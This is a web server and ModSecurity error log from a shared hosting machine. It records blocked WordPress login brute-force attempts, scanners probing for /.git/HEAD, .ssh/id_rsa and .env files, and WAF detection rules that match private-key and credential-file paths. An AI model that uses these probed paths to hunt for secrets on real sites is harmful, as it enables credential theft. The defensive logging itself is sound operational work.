[Tue May 26 18:24:12.156256 2026] [security2:error] [pid 983082:tid 983126] [remote 217.174.148.171:35266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.148.174.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWX9LvhpIlZJOtze4tZMQABBCs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:24:12.199890 2026] [security2:error] [pid 983082:tid 983305] [client 98.159.226.63:42041] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.grcorp.moes-art.com"] [uri "/.git/HEAD"] [unique_id "ahWX9LvhpIlZJOtze4tZNQAAAOI"]
[Tue May 26 18:24:12.633398 2026] [security2:error] [pid 983082:tid 983120] [remote 46.20.146.46:33882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWX9LvhpIlZJOtze4tZQgAAiiU"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 18:24:12.926764 2026] [security2:error] [pid 983082:tid 983269] [client 98.159.226.63:55495] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.git/HEAD"] [unique_id "ahWX9LvhpIlZJOtze4tZTgAAAL4"]
[Tue May 26 18:24:13.782537 2026] [security2:error] [pid 983082:tid 983301] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX9LvhpIlZJOtze4tZSQAAAN4"]
[Tue May 26 18:24:14.679805 2026] [security2:error] [pid 983082:tid 983268] [client 98.159.226.61:46731] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.poonawallatennisacademy.moes-art.com"] [uri "/.git/HEAD"] [unique_id "ahWX9rvhpIlZJOtze4tZcAAAAL0"]
[Tue May 26 18:24:15.139112 2026] [security2:error] [pid 983082:tid 983131] [remote 113.190.40.93:52780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWX9rvhpIlZJOtze4tZcgAAnjA"]
[Tue May 26 18:24:15.409877 2026] [security2:error] [pid 983082:tid 983330] [client 98.159.226.60:47403] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.preetishah.moes-art.com"] [uri "/.git/HEAD"] [unique_id "ahWX97vhpIlZJOtze4tZhgAAAPs"]
[Tue May 26 18:24:15.895685 2026] [security2:error] [pid 983082:tid 983258] [client 5.255.99.53:60024] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "webdisk.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webdisk/.ssh/id_rsa"] [unique_id "ahWX97vhpIlZJOtze4tZkwAAALM"]
[Tue May 26 18:24:15.905310 2026] [core:error] [pid 983082:tid 983283] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:15.905333 2026] [core:error] [pid 983082:tid 983283] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:15.906939 2026] [core:error] [pid 983082:tid 983250] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:15.906965 2026] [core:error] [pid 983082:tid 983250] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.140474 2026] [security2:error] [pid 983082:tid 983286] [client 98.159.226.60:51985] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.shahvishaal.moes-art.com"] [uri "/.git/HEAD"] [unique_id "ahWX-LvhpIlZJOtze4tZmwAAAM8"]
[Tue May 26 18:24:16.194660 2026] [core:error] [pid 983082:tid 983239] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.194682 2026] [core:error] [pid 983082:tid 983239] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.521305 2026] [security2:error] [pid 983082:tid 983295] [client 5.255.99.53:59990] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webdisk/public/.env"] [unique_id "ahWX-LvhpIlZJOtze4tZrgAAANg"]
[Tue May 26 18:24:16.523725 2026] [core:error] [pid 983082:tid 983327] [client 5.255.99.53:59950] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.523743 2026] [core:error] [pid 983082:tid 983327] [client 5.255.99.53:59950] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.535824 2026] [core:error] [pid 983082:tid 983220] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.535846 2026] [core:error] [pid 983082:tid 983220] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.536119 2026] [core:error] [pid 983082:tid 983224] [client 5.255.99.53:59936] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.536144 2026] [core:error] [pid 983082:tid 983224] [client 5.255.99.53:59936] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.545094 2026] [core:error] [pid 983082:tid 983297] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.545110 2026] [core:error] [pid 983082:tid 983297] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.545512 2026] [core:error] [pid 983082:tid 983291] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.545535 2026] [core:error] [pid 983082:tid 983291] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.558374 2026] [core:error] [pid 983082:tid 983320] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.558389 2026] [core:error] [pid 983082:tid 983320] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.609888 2026] [core:error] [pid 983082:tid 983285] [client 5.255.99.53:59914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.609909 2026] [core:error] [pid 983082:tid 983285] [client 5.255.99.53:59914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.650537 2026] [core:error] [pid 983082:tid 983324] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:16.650568 2026] [core:error] [pid 983082:tid 983324] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:17.082798 2026] [security2:error] [pid 983082:tid 983172] [remote 154.66.198.148:20090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWX-LvhpIlZJOtze4tZwgAAjlk"]
[Tue May 26 18:24:17.195028 2026] [core:error] [pid 983082:tid 983248] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:17.195050 2026] [core:error] [pid 983082:tid 983248] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:17.196061 2026] [core:error] [pid 983082:tid 983274] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:17.196075 2026] [core:error] [pid 983082:tid 983274] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:17.196647 2026] [core:error] [pid 983082:tid 983218] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:17.196670 2026] [core:error] [pid 983082:tid 983218] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:17.669191 2026] [security2:error] [pid 983082:tid 983323] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX97vhpIlZJOtze4tZgQAAAPQ"]
[Tue May 26 18:24:18.271478 2026] [core:error] [pid 983082:tid 983217] [client 5.255.99.53:59930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:18.271503 2026] [core:error] [pid 983082:tid 983217] [client 5.255.99.53:59930] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:19.056171 2026] [security2:error] [pid 983082:tid 983272] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX-bvhpIlZJOtze4tZ0QAAAME"]
[Tue May 26 18:24:19.362686 2026] [core:error] [pid 983082:tid 983324] [client 5.255.99.53:60210] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:19.362709 2026] [core:error] [pid 983082:tid 983324] [client 5.255.99.53:60210] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:19.363345 2026] [core:error] [pid 983082:tid 983225] [client 5.255.99.53:60174] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:19.363363 2026] [core:error] [pid 983082:tid 983225] [client 5.255.99.53:60174] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:19.367039 2026] [core:error] [pid 983082:tid 983252] [client 5.255.99.53:60110] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:19.367066 2026] [core:error] [pid 983082:tid 983252] [client 5.255.99.53:60110] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:19.375836 2026] [core:error] [pid 983082:tid 983221] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:19.375851 2026] [core:error] [pid 983082:tid 983221] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:19.409287 2026] [core:error] [pid 983082:tid 983284] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:19.409312 2026] [core:error] [pid 983082:tid 983284] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:19.516116 2026] [core:error] [pid 983082:tid 983316] [client 5.255.99.53:60264] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:19.516133 2026] [core:error] [pid 983082:tid 983316] [client 5.255.99.53:60264] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:20.397352 2026] [core:error] [pid 983082:tid 983249] [client 5.255.99.53:60076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:20.397379 2026] [core:error] [pid 983082:tid 983249] [client 5.255.99.53:60076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:20.621056 2026] [security2:error] [pid 983082:tid 983256] [client 45.148.10.16:58484] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "mail.amslca.com"] [uri "/"] [unique_id "ahWX_LvhpIlZJOtze4taFQAAALE"]
[Tue May 26 18:24:20.958881 2026] [security2:error] [pid 983082:tid 983243] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX-7vhpIlZJOtze4tZ_wAAAKQ"]
[Tue May 26 18:24:21.361863 2026] [core:error] [pid 983082:tid 983304] [client 5.255.99.53:60060] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:21.361888 2026] [core:error] [pid 983082:tid 983304] [client 5.255.99.53:60060] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:21.453082 2026] [security2:error] [pid 983082:tid 983173] [remote 132.148.72.88:50374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWX_bvhpIlZJOtze4taIgAAh1o"]
[Tue May 26 18:24:21.758841 2026] [security2:error] [pid 983082:tid 983196] [remote 154.66.198.148:20090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWX_bvhpIlZJOtze4taKwAAw3E"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:24:22.052437 2026] [security2:error] [pid 983082:tid 983165] [remote 132.148.72.88:50374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWX_bvhpIlZJOtze4taOgAAoVI"], referer: https://jhonweb.com/wp-login.php
[Tue May 26 18:24:22.129871 2026] [security2:error] [pid 983082:tid 983307] [client 181.177.89.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWX_rvhpIlZJOtze4taPgAAAOQ"], referer: https://www.anujtradingco.com/
[Tue May 26 18:24:22.971165 2026] [security2:error] [pid 983082:tid 983336] [client 181.177.89.145:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWX_rvhpIlZJOtze4taUAAAAQE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 18:24:24.108492 2026] [security2:error] [pid 983082:tid 983205] [remote 72.167.150.128:46780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWX_7vhpIlZJOtze4tadwAAqXo"]
[Tue May 26 18:24:24.171887 2026] [security2:error] [pid 983082:tid 983273] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX_rvhpIlZJOtze4taUgAAAMI"]
[Tue May 26 18:24:24.668728 2026] [security2:error] [pid 983082:tid 983156] [remote 72.167.150.128:46780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYALvhpIlZJOtze4tagAAAs0k"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:24:26.862379 2026] [security2:error] [pid 983082:tid 983228] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYAbvhpIlZJOtze4takgAAAJU"]
[Tue May 26 18:24:29.235746 2026] [security2:error] [pid 983082:tid 983334] [client 123.20.54.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYArvhpIlZJOtze4targAAAP8"]
[Tue May 26 18:24:29.952528 2026] [security2:error] [pid 983082:tid 983285] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYA7vhpIlZJOtze4tazgAAAM4"]
[Tue May 26 18:24:30.701262 2026] [security2:error] [pid 983082:tid 983283] [client 181.177.89.145:49604] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWYBbvhpIlZJOtze4ta9AAAAMw"], referer: https://anujtradingco.com
[Tue May 26 18:24:31.807023 2026] [security2:error] [pid 983082:tid 983277] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYBrvhpIlZJOtze4tbAQAAAMY"]
[Tue May 26 18:24:33.183462 2026] [security2:error] [pid 983082:tid 983110] [remote 129.121.76.191:60864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWYCbvhpIlZJOtze4tbWAAAhxs"]
[Tue May 26 18:24:34.132813 2026] [security2:error] [pid 983082:tid 983121] [remote 129.121.76.191:60864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWYCrvhpIlZJOtze4tbbwAAxSY"], referer: https://anujtradingco.com/wp-login.php
[Tue May 26 18:24:34.834504 2026] [security2:error] [pid 983082:tid 983315] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYCLvhpIlZJOtze4tbTAAAAOw"]
[Tue May 26 18:24:36.481974 2026] [security2:error] [pid 983082:tid 983112] [remote 167.172.25.98:56892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYDLvhpIlZJOtze4tbiwAA9B0"]
[Tue May 26 18:24:36.839082 2026] [security2:error] [pid 983082:tid 983282] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYC7vhpIlZJOtze4tbfQAAAMs"]
[Tue May 26 18:24:39.201423 2026] [security2:error] [pid 983082:tid 983120] [remote 34.235.6.233:38582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.6.235.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWYD7vhpIlZJOtze4tbygAAhyU"]
[Tue May 26 18:24:39.417062 2026] [security2:error] [pid 983082:tid 983284] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYDrvhpIlZJOtze4tbuAAAAM0"]
[Tue May 26 18:24:39.521094 2026] [proxy:error] [pid 983082:tid 983292] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:24:39.521143 2026] [proxy_http:error] [pid 983082:tid 983292] [client 198.235.24.153:61424] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:24:39.522045 2026] [proxy:error] [pid 983082:tid 983292] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
